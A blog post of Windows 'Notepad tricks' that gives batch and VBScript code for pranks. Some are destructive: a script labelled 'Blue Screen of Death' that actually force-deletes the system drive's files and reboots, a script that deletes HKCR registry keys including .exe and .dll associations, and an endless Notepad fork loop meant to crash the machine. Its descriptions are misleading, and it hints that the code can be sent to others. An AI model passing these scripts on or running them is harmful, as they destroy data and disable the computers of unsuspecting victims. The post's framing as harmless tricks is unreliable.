Skip to main content

Advanced Tricks of Notepad

Blue Screen of Death [this might be dangerous]

Advance-tricks-of-notepad
The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be careful and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install your windows again.
CODE :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Stupidity ShutDown

This pops up a funny message then will shutdown the computer.
CODE :
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10

Delete Key Registry Files [this is dangerous]

This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)
CODE :
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE ECHO Your computer has been fcked.
Have a nice day. GOTO MESSAGE

Also Read - Make Keyboard to Type Automatically

Endless Notepads

This will pop up endless notepads until the computer freezes and crashes.
CODE :
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

Crazy Caps Lock

This constantly turns caps lock on and off really fast continuously.
CODE :
Set wshShell =wscript.CreateObject ("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Endless Enter

This constantly makes it so the enter button is being pressed continuously.
CODE :
Set wshShell = wscript.CreateObject ("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Also Read - Make your Computer "Welcome You"

Endless Backspace

This makes it so the backspace key is constantly being pressed.
CODE :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject ("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Popping CD Drives

This will make the CD drives constantly pop out.
CODE :
Set oWMP = CreateObject ("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Note - Use these codes at your "OWN" Risk.

Comments

Popular posts from this blog

Amazing Facts About Human Brain

10 Facts About HUMAN BRAIN..! Nerve impulses to and from the brain travel as fast as 170 miles per hour . Ever wonder how you can react so fast to things around you or why that stubbed toe hurts right away? It’s due to the super-speedy movement of nerve impulses from your brain to the rest of your body and vice versa, bringing reactions at the speed of a high powered luxury sports car. The brain operates on the same amount of power as 10-watt light bulb . The cartoon image of a light bulb over your head when a great thought occurs isn't too far off the mark. Your brain generates as much energy as a small light bulb even when you’re sleeping . The human brain cell can hold 5 times as much information as the Encyclopedia Britannica . Or any other encyclopedia for that matter. Scientists have yet to settle on a definitive amount, but the storage capacity of the brain in electronic terms is thought to be between 3 or even 1,000 terabytes . The National Archives of Brit...

Zamber.in - Indian Social Networking Site by AMU

From the Foreground of ALIGARH MUSLIM UNIVERSITY   (AMU) Facebook is now going to tough competition from zamber.in . Two students of AMU have launched a social networking site by the name of Zamber and they are confident that zamber is more secure than the most popular social networking site Facebook.com. According to them nobody can hack accounts of the members of zamber. Members here can do VIDEO CHAT with many friends at the same time. This site is Launched today on 29-April-2014 at night. To make their Launching successful and a grand one they are expecting AMBITABH BACHCHAN as thier Chief Guest. Also Read -  Hack Facebook by Mobile About Creators Zamber is created by the students   from the department of Computer Sciene at AMU . By doing Hard Work for two years they are able to create more secure social networking site than Facebook. One of them USMAN is at 3rd year in B.Tech by Computer Science while the other one AKRAM is at 2nd year in the same...

Unlock Android Smartphone without Pattern Lock Password

Android introduced a cool new feature to ensure protection of private data to it's users by  Pattern Lock  technique. It is a unique thinking, other than remembering or setting difficult combination of password characters whether in numeric or alphabetic form. Pattern lock provides a huge set of patterns to choose from. User may set any unique and different pattern according to their wish anytime. Also Read -  Get Predator Vision on Android Phones With advantage of locking screen using this unique way, there is also a problem that sometimes many of android users have to face that is what if they forget the pattern they had used to lock their device or try to unlock it with wrong pattern number of times that turned device to get locked permanently ? If you stuck in such problem so don't worry there are three methods to unlock your device. Unlock Lock Pattern Using Your Email First method includes a simple way of logging in to your G...